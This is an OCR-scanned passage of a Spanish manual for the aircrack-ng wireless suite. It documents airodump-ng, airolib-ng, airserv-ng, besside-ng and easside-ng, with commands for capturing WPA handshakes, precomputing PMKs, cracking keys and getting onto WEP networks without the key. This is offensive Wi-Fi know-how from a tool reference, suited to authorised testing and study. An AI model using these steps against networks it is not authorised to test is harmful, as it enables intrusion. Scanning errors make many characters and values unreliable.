Para madwifi-ng, primero parar todas las interfaces: 
airmon-ng stop athX 

donde X es 0, 1,2, etc. Hacer una parada para cada interfaz que enumere iwconfig. Entonces: 
wlanconfig ath create wlandev wifiO wlanmode sta 

Para los controladores mac80211, no se debe hacer nada, ya que airmon-ng mantiene la interfaz 
administrada junto con el modo de monitor uno. Si ya no necesita la interfaz del monitor y desea 
eliminarla, usar lo siguiente: 
airmon-ng stop monX 

X es el número de interfaz del monitor: 0 a menos que ejecute varias interfaces de monitorización 
simultáneamente. 



9. Airodump-ng 


Airodump-ng se utiliza para la captura de paquetes de tramas 802.11 sin formato y es 
particularmente adecuado para recopilar WEP IV (Vector de inicialización) con la intención de 
usarlos con aircrack-ng. Si tiene un receptor GPS conectado a la computadora, airodump-ng es 
capaz de registrar las coordenadas de los puntos de acceso encontrados. Además airodump-ng 
escribe varios archivos que contienen los detalles de todos los puntos de acceso y de los clientes 
vistos. 

Antes de ejecutar airodump-ng, se debe poner la interfaz inalámbrica por la que se escucha en modo 
monitor. 

Uso: airodump-ng <opciones> <interface>[,<interface>,...] 

Opciones: 


—ivs 

Guardar solo IV capturados 

-gpsd 

Usar GPS 

—write <prefix> 

Volcar en el fichero prefijado 

-w 

Igual que —write 

—beacons 

Graba todos los beacons en el fichero de volcado 

—update <secs> 

Visualizar el retardo de actualización en segundos 

—showack 

Imprimir las estadísticas ack/cts/rts 

-h 

Esconder las estaciones conocidas para —showack 

-f <msecs> 

Tiempo en mseg entre los canales hopping 

—berlin <secs> 

Tiempo antes de eliminar el AP/cliente de la pantalla cuando 
no se reciben más paquetes. Valor predeterminado: 120 seg. 

-r <file> 

Eeer los paquetes del fichero 

-X <msecs> 

Active Scanning Simulation 

—manufacturer 

Visualizar el fabricante de la lista IEEE GUI 

—uptime 

Mostrar el tiempo de actividad de AP desde la hora en el 
beacon 

—wps 

Visualizar la información WPS si la hay 

—output-format <formats> 

Pormato de salida. Valores posibles: pcap, ivs, csv, gps, 
kismet, netxml 

—ignore-negative-one 

Elimina el mensaje que dice canal fijo <interfaz>: -1 

—write-interval <seconds> 

Intervalo de escritura del fichero de salida en segundos 


Opciones de filtro: 


—encrypt <suite> 

Piltrar AP por conjunto de cifrado 

—netmask <netmask> 

Piltrar los APs por máscara 

—bssid <bssid> 

Piltrar los APs por BSSID 

—essid <essid> 

Piltrar los APs por ESSID 




—essid-regex <regex> 

Filtrar los APs por ESSID usando una expresión regular 

-a 

Filtrando los clientes no asociados 


Se pue de hacer que capture determinados canales usando: 


—channel <channels> 

Capturar en determinados canales 

—band <abg> 

Banda en la que airodump-ng debe saltar 

-C <frequencies> 

Usar estas frecuencias en MHz para saltar 

—cswitch <method> 

Establecer el método de conmutación de canal 0: EIEO 
(defecto), 1: Round Robin, 2: Hop on last 

-s 

Igual que —cswitch 

—help 

Visualiza el uso de este comando 


Proporciona los siguientes datos 


BBSID 

Dirección MAC del punto de acceso 

PWR 

nivel de señal del router inalámbrico, cuanto más cercano 
estemos del dispositivo, menor será el valor absoluto de este 
número. Si el BSSID PWR es -1, entonces el controlador no 
admite el informe de nivel de señal. Si el PWR es -1 para un 
número limitado de estaciones, entonces esto es para un paquete 
que vino del AP al cliente pero las transmisiones del cliente están 
fuera del alcance de su tarjeta. Eo que significa que está 
escuchando solo la mitad de la comunicación. Si todos los 
clientes tienen PWR como -1, entonces el controlador no es 
compatible con los informes de nivel de señal. 

beacons 

número de beacons enviado por el punto de acceso. 

Normalmente se envían unos 10 paquetes por segundo 

RXQ 

Calidad de recepción medida por el porcentaje de paquetes 
(marcos de gestión y datos) recibidos con éxito durante los 
últimos 10 segundos. 

Data, #/s 

número de paquetes de datos capturados y número de paquetes 
capturados por segundo durante los últimos 10 segundos 

CH 

número del canal 

MB 

velocidad máxima del punto de acceso 

ENC y CIPH 

Algoritmo de cifrado que se está utilizando 

AUTH 

Protocolo de autenticación 

ESSID 

Nombre de la red 

STATION 

Dirección de cada estación asociada. 

EOST 

Paquetes perdidos en los últimos 10 segundos 

Packets 

número de paquetes enviados por el cliente 

Probe 

Redes a las que se ha intentado conectar el cliente 


NOTAS 

RXQ expandido: 






Se mide sobre todos los paquetes de gestión y datos. Los paquetes reeibidas eontienen un número 
de seeuencia que es agregado por el punto de aeeeso de envió. RXQ =100 signifiea que todos los 
paquetes fueron reeibidos desde el punto de aeeeso en seeueneia numériea y ninguno faltaba. Esta 
es la pista, esto le permite leer más eosas de este valor. Digamos que tienes 100 por eiento de RXQ 
y las 10 balizas (o la veloeidad que sea) por segundo entrando. Ahora, de repente, el RXQ eae por 
debajo de 90, pero aún asi eaptura todas los beacons enviados. Por lo tanto sabe que el AP está 
enviando paquetes a un eliente, pero no puede eseuehar al eliente ni al AP enviando al oliente, 
neoesita aceroarse. Otra oosa seria que tienes una tarjeta de 11MB para monitorizar y oapturar 
paquetes y se tiene una muy buena posioión para el AP. El AP está oonfigurado en 54MBit y luego 
nuevamente el RXQ eae, para que sepa que hay al menos un cliente de 54MBit conectado al AP. 

Ea columna RXQ solo se mostrará si está bloqueado en un solo canal, no en el salto de canal. 

Perdido expandido: 

Significa paquetes perdidos provenientes del cliente. Para determinar la cantidad de paquetes 
perdidos, hay un campo de secuencia en cada trama sin control, para que pueda restar el segundo 
último número de secuencia del último número de secuencia y sepa cuantos paquetes ha perdido. 
Posibles razones para la pérdida de paquetes: 

1. No se puede enviar en caso de que esté enviando y escuchar al mismo tiempo, por lo que cada 
vez que envia algo no puede escuchar los paquetes que se transmiten en este intervalo. 

2. Tal vez esté perdiendo paquetes debido a una potencia de transmisión demasiado alta. Puede estar 
demasiado cerca del AP. 

3. Hay demasiado ruido en el canal actual como otros AP, homo de microondas, bluetooth ... 

Para minimizar la cantidad de paquetes perdidos, variar la posición física, el tipo de antena 
utilizada, el canal, la velocidad de datos y/o la velocidad de inyección. 

Se pueden convertir archivos .cap / .dump a formato .ivs o fusionarlos. 

9.1. Trucos 

9.1.1. ¿Cuál es el significado de los campos que muestra 
airodump-ng? 

airodump-ng mostrará una lista de puntos de acceso detectados y también una lista de clientes 
conectados. Aquí hay una captura de pantalla de ejemplo: 

CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPAhandshake: 00:14:6C:7E:40:80 
BSSID PWRRXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


00:09:5B:1C:AA:1D 

11 16 

10 

0 

0 

11 

54. 

OPN 

NETGEAR 

00:14:6C:7A:41:81 

34 100 

57 

14 

1 

9 

lie 

WEP WEP 

bigbear 

00:14:6C:7E:40:80 

32 100 

752 

73 

2 

9 

54 

WPA TKIP 

PSK teddy 


BSSID STATION PWR Rate Eost Packets Probes 

00:14:6C:7A:41:81 00:0P:B5:32:31:31 51 36-24 2 14 

(not associated) 00:14:A4:3P:8D:13 19 0-0 0 4 mossy 

00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 36-36 0 5 

00:14:6C:7E:40:80 00:0P:B5:PD:PB:C2 35 54-54 0 99 teddy 

Ea primera línea muestra el canal actual, el tiempo de ejecución transcurrido, la fecha actual y 
opcionalmente, si se detectó un protocolo de enlace WPA/WPA2. En el ejemplo anterior, "WPA 
handshake: 00: 14: 6C: 7E: 40: 80" indica que un protocolo de enlace WPA/WPA2 fue capturado 
con éxito para el BSSID. 

En el ejemplo anterior, la tasa de clientes de "36-24" significa: 



• El primer número es la última veloeidad de datos del AP (BSSID) al Cliente (ESTACIÓN). 
En este easo 36 megabits por segundo. 

• El segundo número es la última veloeidad de datos del Cliente (ESTACIÓN) al AP (BSSID). 
En este caso, 24 megabits por segundo. 

• Estas tasas pueden cambiar potencialmente en cada transmisión de paquetes. Es 
simplemente la última velocidad vista. 

• Estas velocidades solo se muestran cuando están bloqueadas en un solo canal, las 
velocidades de transmisión de AP / cliente se muestran como parte de los clientes 
enumerados en la parte inferior. 

NOTA: Eos AP necesitan más de un paquete para aparecer en la pantalla. Eos AP con un solo 
paquete no se muestran. 

9.1.2. Ejecutar aircrack-ng mientras se capturan datos 

Para acelerar el proceso de craqueo, ejecutar aircrack-ng mientras se ejecuta airodump-ng. Se puede 
capturar y crackear al mismo tiempo. Aircrack-ng volverá a leer periódicamente los datos 
capturados para que siempre funcione con todos los IV disponibles. 

9.1.3. Limitando ia captura de datos a un soio AP 

Para limitar la captura de datos a un único AP que le interese, inclua la opción "- -bssid" y 
especificar la dirección MAC del AP. 

Por ejemplo: "airodump-ng -c 8 - -bssid 00: 14: 6C: 7A: 41: 20 -w capture athO". 

9.1.4. Como minimizar ei espacio de disco para ias capturas 

Para minimizar el espacio en disco utilizado por la captura, incluir la opción "- -ivs". Por ejemplo: 
"airodump-ng -c 8 - -bssid 00: 14: 6C: 7A: 41: 20 -w capture - -ivs athO". Esto solo almacena los 
vectores de inicialización y no el paquete completo. Esto no se puede utilizar si está intentando 
capturar el protocolo de enlace WPA / WPA2 o si desea utilizar el ataque PTW en WEP 

9.1.5. 9.1.5. Cmo seieccionar todos ios AP que comienzan con 
BSSiD simiiares 

Digamos, por ejemplo, que se desea capturar paquetes para todos los puntos de acceso de Cisco- 
Einksys donde el BSSID comienza con "00: IC: 10". 

Usted especifica que los bytes iniciales desea que coincidan con la opción "-d" / "-bssid" y rellene 
con ceros a un MAC completo. Euego use la opción “-m” / “-netmask” para especificar qué parte 
del BSSID desea hacer coincidir a través de “E” s y pad con ceros a un MAC completo. 

Entonces, dado que desea hacer coincidir “00: IC: 10”, utilice “EE: EE: EE”. 
airodump-ng -d 00: IC: 10: 00: 00: 00 -m EE: EE: EE: 00: 00: 00 wlanO 

9.1.6. Como seieccionar canaies específicos o un soio canai 

Ea opción "-channel" (-c) permite seleccionar canales únicos o específicos. Ejemplo de un solo 
canal: 

airodump-ng -c 11 wlanO 

Para las tarjetas que deben reiniciarse en un solo canal: 
airodump-ng -c 11,11 wlanO 
Ejemplo de canales seleccionados: 
airodump-ng -c 1,6,11 wlanO 

9.1.7. Ficheros de texto que contiene ios puntos de acceso y ios 
ciientes 

Cada vez que se ejecuta airodump-ng con la opción de escribir IVs o paquetes completos, también 
se generan algunos archivos de texto y se escriben en el disco. Tienen el mismo nombre y un sufijo 
de ".csv" (archivo CSV), ".kismet.csv" (archivo Kismet CSV) y ".kismet.netxml". El archivo CSV 
contiene los detalles de todos los puntos de acceso y clientes vistos. 

Aquí hay un ejemplo: 



BSSID, First time seen, Last time seen, channel, Speed, Privaey, Cipher, Authentication, Power, # 
beacons, # IV , LAN IP, ID-length, ESSID, Key 

00:1C:10:26:22:41, 2007-10-07 12:48:58, 2007-10-07 12:49:44, 6, 48, WEP , WEP, , 171, 

301, 0,0. 0. 0. 0, 5, zwang, 

00:1A:70:51:B5:71, 2007-10-07 12:48:58, 2007-10-07 12:49:44, 6, 48, WEP , WEP, , 175, 

257, 1,0. 0. 0. 0, 9, brueeyl23, 

00:09:5B:7C:AA:CA, 2007-10-07 12:48:58, 2007-10-07 12:49:44, 11, 54, OPN , , , 189, 

212, 0, 0. 0. 0. 0, 7,NETGEAR, 

Station MAC, Eirst time seen, East time seen, Power, # paekets, BSSID, Probed ESSIDs 
00:1B:77:7P:67:94, 2007-10-07 12:49:43, 2007-10-07 12:49:43, 178, 3, (not assoeiated), 

9.2. Interacción 

Desde la revisión rl648, airodump-ng puede reeibir e interpretar pulsaeiones de teelas mientras se 
ejeeuta. Ea siguiente lista deseribe las teelas asignadas aetualmente y las supuestas aeeiones. 

• [a]: Seleceione las áreas activas recorriendo estas opciones de visualización: AP + STA; AP 
+ STA + ACK; AP solamente; Solo STA 

• [d]: restablecer la clasificación a los valores predeterminados (Power) 

• [i]: algoritmo de clasificación invertida 

• [m]: Marcar el AP seleccionado o pase por diferentes colores si el AP seleccionado ya está 
marcado 

• [r]: (De-) Activar la ordenación en tiempo real: aplica el algoritmo de ordenación cada vez 
que se vuelve a dibujar la pantalla 

• [s]: Cambiar la columna para ordenar, que actualmente incluye: Primero visto; BSSID; 
Nivel de PWR; Beacons; Paquetes de datos; Tasa de paquete; Canal; Max. velocidad de 
datos; Cifrado; Ciphersuite más fuerte; Autenticación más fuerte; ESSID 

• [ESPACIO]: Pausar redibujar pantalla / Reanudar redibujar 

• [TAB]: activar / desactivar el desplazamiento a través de la lista AP 

• [ARRIBA]: seleccione el AP antes del AP marcado actualmente en la lista mostrada si está 
disponible 

• [ABAJO]: seleccione el AP después del AP marcado actualmente si está disponible 
Si se selecciona o marca un AP, todas las estaciones conectadas también se seleccionarán o 
marcarán con el mismo color que el punto de acceso correspondiente. 



10. Airolib-ng 


10.1. Descripción 

Airolib-ng está diseñada para almaeenar y administrar listas de essid y contraseñas, calcular sus 
claves maestras por pares (PMK) y usarlas en el craqueo WPA/ WPA2. El programa utiliza la ligera 
base de datos SQLiteS como mecanismo de almacenamiento que está disponible en la mayoría de 
las plataformas. La base de datos SQLiteS se seleccionó teniendo en cuenta la disponibilidad de la 
plataforma más la administración, la memoria y la sobrecarga del disco. 

El craqueo de WPA / WPA2 implica el cálculo de la clave maestra por pares, de la cual se deriva la 
clave transitoria privada (PTK). Eísando el PTK, podemos calcular el código de identidad del 
mensaje de trama (MIC) para un paquete dado y potencialmente encontraremos que el MIC es 
idéntico al del paquete, por lo tanto, el PTK era correcto, por lo tanto, el PMK también era correcto. 

Calcular el PMK es muy lento ya que usa el algoritmo pbkdfZ. Sin embargo el PMK es siempre el 
mismo para una combinación de ESSID y contraseña. Esto nos permite calcular previamente el 
PMK para combinaciones dadas y acelerar el craqueo del handshake wpa / wpa2. Las pruebas han 
demostrado que el uso de esta técnica en aircrack-ng puede verificar más de 50 000 contraseñas por 
segundo utilizando tablas PMK calculadas previamente. 

Todavia se requiere calcular el PMK, pero podemos: 

• Precomputarlo para uso posterior y / o compartido. 

• Usar máquinas distribuidas para generar el PMK y use su valor en otro lugar. 

Uso: airolib <database> <operación> [opciones] 

Operaciones: 


—stats 

Salida de información sobre la base de datos. 

—sql <sql> 

Ejecutar instrucción SQL especificada. 

—clean [all] 

Limpiar la base de datos de la basura vieja, 'all' 
también reducirá el tamaño del archivo si es posible 
y ejecutará una verificación de integridad. 

—batch 

Comenzar a procesar por lotes todas las 
combinaciones de ESSID y contraseñas 

—verify [all] 

Verificar un conjunto de PMK elegido al azar. Si se 
da 'air, se eliminarán todos los PMK no válidos. 

—import [essid passwd] <fde> 

Importar un fichero texto como una lista de ESSIDs 

0 contraseñas. 

—import cowpatty <file> 

Importar un fichero cowpatty 

—export cowpatty <essid> <file> 

Exportar a un fichero cowpatty 


10.2. Ejemplos 
10.2.1. Operación de estado 

Ejecutar: 

airolib-ng testdb —stats 
donde 


testdb es el nombre de la base de datos creada 




• - -stats es la operación a realizar 

El sistema responde: 

statsThere are 2 ESSIDs and 232 passwords in the database. 464 out of 464 possible combinations 
have been computed (100%). 

ESSID Priority Done 
Harkonen 64 100.0 

teddy 64 100.0 

10.2.2. Operación SQL 

El ejemplo siguiente dará la máxima prioridad SSID “VeryImportantESSID”. 

Ejecutar: 

airolib-ng testdb —sql ’update essid set prio=(select min(prio)-l from essid) where 
essid=" VeryImportantESSID";' 

El sistema responde: 

update essid set prio=(select mm(prio)-l from essid) where essid="VeryImportantESSID"; 

Query done. 1 rows aflfected. 

El ejemplo siguiente buscará patrones muy importantes en el pmk. 

Ejecutar: 

airolib-ng testdb —sql 'select hex(pmk) from pmk where hex(pmk) like "%DEADBEEE%"' 

El sistema responde: 
hex(pmk) 

BE3E122D3CE9ED6C6E7E1D7D13505E0A41EC4C5A3DEADBEEEEEEE597387AECE3 

10.2.3. Operación Ciean 

Para hacer un limpiado básico, ejecutar: 
airolib-ng testdb —ciean 
El sistema responde: 

cleanDeleting invalid ESSIDs and passwords... 

Deleting unreferenced PMKs... 

Analysing Index structure... 

Done. 

Para hacer un limpiado básico, reducir el tamaño del fichero si es posible y ejecutar una verificación 
de integridad. Ejecutar: 
airolib-ng testdb —ciean all 
El sistema responde: 

cleanDeleting invalid ESSIDs and passwords... 

Deleting unreferenced PMKs... 

Analysing Index structure... 

Vacuum-cleaning the database. This could take a while... 

Checking database integrity... 

integrity_check 

ok 

Query done. 2 rows aflfected. 

Done. 

10.2.4. Operación Batch 

Ejecutar: 

airolib-ng testdb —batch 
El sistema responde: 

Computed 464 PMK in 10 seconds (46 PMK/s, 0 in buflfer). No firee ESSID found. Will try 
determining new ESSID in 5 minutes... 

10.2.5. Operación Verify 

Para verificar un 1000 random PMKs, ejecutar: 



airolib-ng testdb —verify 
El sistema responde: 

verifyCheeking -'10.000 randomly ehosen PMKs... 

ESSID CHECKED STATUS 
Harkonen 233 OK 
teddy 233 OK 

Para verifiear todos los PMKs, ejeeutar: 
airolib-ng testdb —verify all 
El sistema responde: 

verifyCheeking all PMKs. This could take a while... 

ESSID PASSWORD PMK DB CORRECT 

10.2.6. Operación exportar la tabla cowpatty 

Ejeeutar: 

airolib-ng testdb —export eowpatty test eowexportoftest 
El sistema responde: 
exportExporting... 

Done. 

10.2.7. Operación Import 

SSID 

Para importar una lista ASCII de SSID y erear la base de datos si no existe, ejecutar: 
airolib-ng testdb —import essid ssidlist.txt 
donde 

• testdb es el nombre de la base de datos actualiza y creada si no existe 

• - -import es la operación a realizar 

• essid indica que es la lista de SSID 

• ssidlist.txt es el nombre del fichero que contiene los SSID. Uno por linea. Opcionalmente 
puede ser completamente cualificado. 

El sistema responde: 
importReading... 

Writing... 

Done. 

Contraseñas 

Para importar una lista ASCII de contraseñas y crear la base de datos si no existe, ejecutar: 
airolib-ng testdb —import passwd password.lst 
donde 

• testdb es el nombre de la base de datos actualiza y creada si no existe 

• - -import es la operación a realizar 

• passwd indica que es la lista de contraseñas 

• password.txt es el nombre del fichero que contiene los SSID. Uno por linea. Opcionalmente 
puede ser completamente cualificado. 

El sistema responde: 
importReading... 

Writing... read, 1814 invalid Unes ignored. 

Done. 

Tablas cowpatty tables 

Importar una tabla cowpatty y crear la base de datos si no existe, ejecutar: 
airolib-ng testdb —import cowpatty eowexportoftest 
donde 

• testdb es el nombre de la base de datos actualiza y creada si no existe 

• - -import es la operación a realizar 

• cowpatty indica que es la tabla cowpatty 



• cowexportoftest es el nombre del fiehero que eontiene los SSID. Uno por línea. 
Opeionalmente puede ser eomplelamente eualifieado. 

El sistema responde: 

ImportReading header... 

Reading... 

Updating referenees... 

Writing... 

10.3. Ejemplo 

El objetivo final es acelerar el craqueo de WPA / WPA2 bajo aircrack-ng. Para usar las tablas que se 
han creado con airolib-ng, usar la opción "-r" para especificar la base de datos que contiene las 
PMK calculadas previamente. 

Ejecutar: 

aircrack-ng -rtestdb wpa2.eapol.cap 
donde: 

• -r especifica que se utilizará una base de datos PMK calculada previamente. 

• testdb es el nombre del archivo de la base de datos y opcionalmente puede estar 
completamente calificado. 

• wpa2.eapol.cap es un archivo de captura que contiene el handshake WPA / WPA2. 

Nota: También se pueden usar todas las otras opciones estándar que son aplicables a WPA / WPA2. 
Este es un ejemplo muy limitado. 

10.4. Trucos 

10.4.1. Creando su propio ejemplo de base de datos 

Para probar la herramienta: 

• Obtener la biblioteca y los encabezados de sqliteS. Se recomienda la última versión. 

• Obtener la versión 1 .Odev de la suite aircrack-ng 

• importar un essid, p.e. "Echo Harkonen | airolib-ng testdb -import essid - ” 

Database <testdb> does not already exist, creating it... 

Database <testdb> sucessfully created 
Reading file... 

Writing... 

Done. 

Importar una contraseña, p.e. “echo 12345678 | airolib-ng testdb -import passwd -” 

Reading file... 

Writing... 

Done. 

Iniciar el proceso batch (“airolib-ng testdb -batch”), esperar que acabe o pararlo con Ctrl-C 
Computed 1 PMK in 0 seconds (1 PMK/s, 0 in bufíbr). All ESSID processed. 

Comprobar la base de datos para confirmar que todo ha sido computado (“airolib-ng testdb -stats”) 
There are 1 ESSIDs and 1 passwords in the database. 1 out of 1 possible combinations have been 
computed (100%). 

ESSID Priority Done 
Harkonen 64 100.0 

Craquear el WPA/WPA2 handshake, p.e. “aircrack-ng -r testdb -e Harkonen wpa2.eapol.cap” 
KEYEOUND! [ 12345678 ] 

10.4.2. Usando una base de datos prueba preparada 

Otra forma de probarlo es descargar una base de datos prefabricada llamada passphrases.db. Este 
archivo también se encuentra en el directorio de prueba de las fuentes aircrack-ng. Euego probar 
esta base de datos con los dos archivos de prueba WPA / WPA2 suministrados en el directorio de 



prueba de las fuentes aireraek-ng. Los arehivos de prueba WPA/ WPA2 se denominan "wpa.cap" y 
"wpa2.eapol.oap". 

Los oomandos son uno de los 2: 
airoraok-ng -r passphrases.db wpa.oap 
aircraok-ng -r passphrases.db wpa2.eapol.cap 
Esto daría una passphase. 



11. Airserv-ng 


11.1. Descripción 

Airserv-ng es un servidor de tarjetas inalámbricas que permite que múltiples programas de 
aplicaciones inalámbricas usen independientemente una tarjeta inalámbrica a través de una 
conexión de red TCP cliente-servidor. Todos los códigos especificos del sistema operativo y del 
controlador de la tarjeta inalámbrica están incorporados en el servidor. Esto elimina la necesidad de 
que cada aplicación inalámbrica contenga la compleja tarjeta inalámbrica y la lógica del 
controlador. También es compatible con múltiples sistemas operativos. 

Cuando se inicia el servidor, escucha en un número de puerto IP y TCP especifico las conexiones 
del cliente. La aplicación inalámbrica se comunica con el servidor a través de esta dirección IP y 
puerto. Al utilizar las fúnciones de la suite aircrack-ng, debe especificar "<dirección IP del 
servidor> : <número de puerto>" en lugar de la interfaz de red. Un ejemplo es 127.0.0.1:666. 

Esto permite una serie de posibilidades interesantes: 

• Eliminar la complejidad de la tarjeta / controlador inalámbrico, los desarrolladores de 
software pueden concentrarse en la funcionalidad de la aplicación. Esto conducirá a un 
mayor conjunto de aplicaciones disponibles. También reduce drásticamente el esfuerzo de 
mantenimiento. 

• Los sensores remotos ahora son fáciles de implementar. Solo se requiere una tarjeta 
inalámbrica y airserv-ng para funcionar en el sensor remoto. Esto significa que se pueden 
crear fácilmente pequeños sistemas integrados. 

• Puede mezclar y combinar sistemas operativos. Cada pieza puede ejecutarse en un sistema 
operativo diferente. El servidor y cada una de las aplicaciones pueden ejecutarse 
potencialmente en un sistema operativo diferente. 

• Algunas tarjetas inalámbricas no permiten que múltiples aplicaciones accedan a ellas a la 
vez. Esta restricción ahora se elimina con el enfoque cliente-servidor. 

• Al utilizar la red TCP, el cliente y el servidor pueden estar literalmente en diferentes partes 
del mundo. Mientras tenga conectividad de red, funcionará. 

Uso: airserv-ng <opciones> 

Opciones 


-p <port> 

Puerto TCP porel que se escucha. Por defecto 666. 

-d <dev> 

Dispositivo wifi a usar como servidor. 

-c <chan> 

Canal a usar. 

-V <level> 

Nivel de depuración 


11.2. Niveles de depuración 

Hay 3 niveles de depuración. El nivel de depuración 1 es el predeterminado si no incluye la opción 
"-v". 

Nivel de depuración 1 

Muestra los mensajes de conexión y desconexión. 

Ejemplos: Conectarse desde 127.0.0.1 Death desde 127.0.0.1 




Nivel de depuraeión 2 

Muestra las solieitudes de eambio de eanal y solieitudes de eomando de eliente no válidas además 
de los mensajes de nivel 1 de depuraeión. La solieitud de eambio de eanal indiea que eanal solieitó 
el eliente. 

Ejemplos: [127.0.0.1] Consiguió setehan 9 [127.0.0.1] handle elient: net get () 

Nivel de depuraeión 3 

Muestra un mensaje eada vez que se envia un paquete al eliente. La longitud del paquete también se 
indiea. Este nivel ineluye los mensajes de nivel 1 y nivel 2. 

Ejemplos: [127.0.0.1] Envió de paquete 97 [127.0.0.1] Envió de paquete 97 

11.3. Ejemplos 

En todos los easos, primero debe poner la tarjeta inalámbriea en modo monitor usando airmon-ng o 
una téeniea similar. 

11.3.1. Máquina local 

Este eseenario tiene todos los eomponentes ejeeutándose en el mismo sistema. 

Inieiar el programa eon: 
airserv-ng -d athO 

donde -d athO es la tarjeta de red a usar. Espeeifiear la interfaz de red de esta tarjeta en euestión. 

El sistema responde: 

Opening eard athO 
Setting ehan 1 
Opening soek port 666 
Serving athO ehan 1 on port 666 

En este punto, se puede utilizar eualquiera de los programas de la suite aireraek-ng y espeeifiear 
"127.0.0.1:666" en lugar de la interfaz de red. 127.0.0.1 es la IP de "loopbaek" del ordenaador y 666 
es el número de puerto en el que se ejeeuta el servidor. 

Ejemplo: 

airodump-ng 127.0.0.1:666 

Se inieiará el eseaneo en todas las redes. 

11.3.2. Máquina remota 

En este eseenario, el servidor se ejeeuta en un sistema eon una direeeión IP de 192.168.0.1 y las 
aplieaeiones (airodump-ng, aireplay-ng, ...) en otro sistema. 

Inieiar el programa eon: 
airserv-ng -d athO 

donde -d athO es la tarjeta de red a usar. Espeeifiear la interfaz de red de esta tarjeta en euestión. 

El sistema responde: 

Opening eard athO 
Setting ehan 1 
Opening soek port 666 
Serving athO ehan 1 on port 666 

En este punto, puede usar eualquiera de los programas de la suite aireraek-ng en el segundo sistema 
y espeeifiear "192.168.0.1:666" en lugar de la interfaz de red. 192.168.0.1 es la direeeión IP del 
sistema del servidor y 666 es el número de puerto en el que se ejeeuta el servidor. 

En el segundo sistema, debe ejeeutar "airodump-ng 192.168.0.1:666" para eomenzar a eseanear 
todas las redes. Puede ejeeutar aplieaeiones aireraek-ng en tantos sistemas eomo desee, 
simplemente espeeifieando "192.168.0.1:666" eomo la interfaz de red. 

Ejemplo: 

airodump-ng -o 6 192.168.0.1:666 



12. Besside-ng 


12.1. Descripción 

Besside-ng es una herramienta eomo Wesside-ng, pero también admite el eifrado WPA. Lo eual 
deseifrará automátieamente todas las redes WEP dentro del aleanee y registrará los handshakes 
WPA. Los handshakes WPA eapturados se pueden eargar al servieio de eraqueo en linea en 
Darkireop.org (Besside-ng Companion) para intentar obtener la eontraseña y donde proporeiona 
estadistieas útiles basadas en arehivos de eaptura enviados por el usuario sobre la viabilidad del 
eraqueo de WPA. 

Requerimientos 

• Aireraek-ng SVN versión 

• interfaz inalámbriea eon inyeeeión 

Uso; besside-ng [opeiones] <interfaee> 

Opeiones: 


-b <viotim mao> 

MAC BSSID de la vietima 

-R <viotim ap regex> 

regex ESSID de la vietima 

-s <WPA server> 

Subir wpa.eap para deseifrar 

-0 <ohan> 

Channel loek 

-p <pps> 

Tasa de flujo 

-W 

Solo WPA 

-V 

verboso, -vv para más, ete. 

-h 

Esta ayuda 


12.2. Ejempios 

1) Para deseifrar automátieamente todas las redes WEP en el rango y obtener también posibles 
protoeolos de WPA; 

besside-ng monO 

2) Para obtener un protoeolo de enlaee WPA de un objetivo espeeifieo (eanal y BSSID); 
besside-ng -W -e 6 -b 00; 00; 11; 22; 33; 44 monO 

3) Pantalla terminal 
[22;33;12] Eefs ride 
[22;33;12] Logging to besside.log 

[22;33;20] TO-OWN [Besside-ng Test*] OWNED [] 

[22;33;38] TO-OWN [Besside-ng_Test*] OWNED [] 

[22;33;56] TO-OWN [Besside-ng Test*] OWNED [] 

[22;33;59] Got neeessary WPAhandshake info for Besside-ng Test 
[22;33;59] Run aireraek on wpa.eap for WPAkey 
[22;33;59] Pwned network Besside-ng_Test in 0;39 mins;seo| 


4) Comprobar el fiehero de registro; 




cat besside.log 


5)Pantalla de terminal 

# SSID IKEY IBSSID | MAC fdter 

Besside-ng_Test | Got WPA handshake | 00:00:11:22:33:44 | 

12.3. Besside-ng-Crawler 

Herramienta para limpiar arehivos PCAP de protoeolo de enlaee WPA en un direetorio y guardarlos 
en un arehivo de salida. 

Esta herramienta recurre al directorio SearchDir, abre todos los archivos alli, busca archivos PCAP 
y filtra un único beacon y todos los paquetes EAPOE de las redes WPA alli y los guarda en 
CapEileOut. 

besside-ng-crawler <SearchDir> <CapPileOut> 



13. Easside-ng 


13.1. Descripción 

Easside-ng es una herramienta de magia automátiea que le permite eomuniearse a través de un 
punto de aeeeso (AP) eneriptado WEP sin eonoeer la elave WEP Primero identifiea una red, luego 
proeede a asoeiarse eon ella, obtiene los datos de PRGA (algoritmo de generaeión pseudoaleatoria), 
determina el esquema de IP de la red y luego eonfigura una interfaz TAP para que pueda 
eomuniearse eon el AP sin neeesidad de la elave WEP Todo esto se haee sin su interveneión. 

Para aeeeder a la red inalámbriea sin eonoeer la elave WEP, se tiene que deseifrar los paquetes del 
propio punto de aeeeso. Esto se logra al tener un proeeso "buddy" que se ejeeuta en un servidor 
aeeesible en Internet. El servidor "buddy" devuelve los paquetes deseifrados al sistema que ejeeuta 
easside-ng. Esto impone una serie de requisitos eritieos para que funeione easside-ng; 

• El punto de aeeeso de destino debe poder eomuniearse eon Internet. 

• Debe existir un servidor "buddy" en Internet sin eortafuegos del puerto utilizado por 
easside-ng. El valor predeterminado es TCP y puerto UDP 6969. 

• El sistema que ejeeuta easside-ng debe tener aeeeso a Internet y poder eomuniearse eon el 
servidor "buddy". 

Hay dos fases generales: 

• Estableeer una eoneetividad básiea entre easside-ng, el servidor buddy y el punto de aeeeso. 

• Ea eomunicaeión eon la red Wifi 

Uso; easside-ng <opeiones> 

Opeiones: 


-h • 

Esta pantalla de ayuda 

-V <vietim mae> • 

BSSID de la vietima 

-m <sre mae> • 

Direeeión MAC de origen 

-i <ip> • 

Direeeión IP origen 

-r <router ip> • 

Direeeión del enrutador 

-s <buddy ip> • 

Direeeión IP del amigo (obligatorio) 

-f <ifaee> • 

Interfaz a utilizar (obligatorio) 

-e <ehannel> • 

Tarjeta de bloqueo a este eanal. 

-n • 

Determinar solo IP de Internside 


Cuando ejeeuta easside-ng, se erea un arehivo automátieamente en el direetorio aetual prga.log que 
eontiene el PRGA obtenido a través del ataque de fragmentaeión. 

Es muy importante eliminar este arehivo antes de inieiar el programa euando eambie el punto de 
aeeeso objetivo. 

13.2. Estableciendo la eoneetividad 

Estos son los pasos que essside-ng realiza durante la fase de estableeimiento de eoneetividad; 

1. El eanal salta buseando una red WEP. 

2. Una vez que se eneuentra una red, intenta autentiearse. 






3. Una vez que el programa se ha autentieado eon éxito, se asoeia eon el AP. 

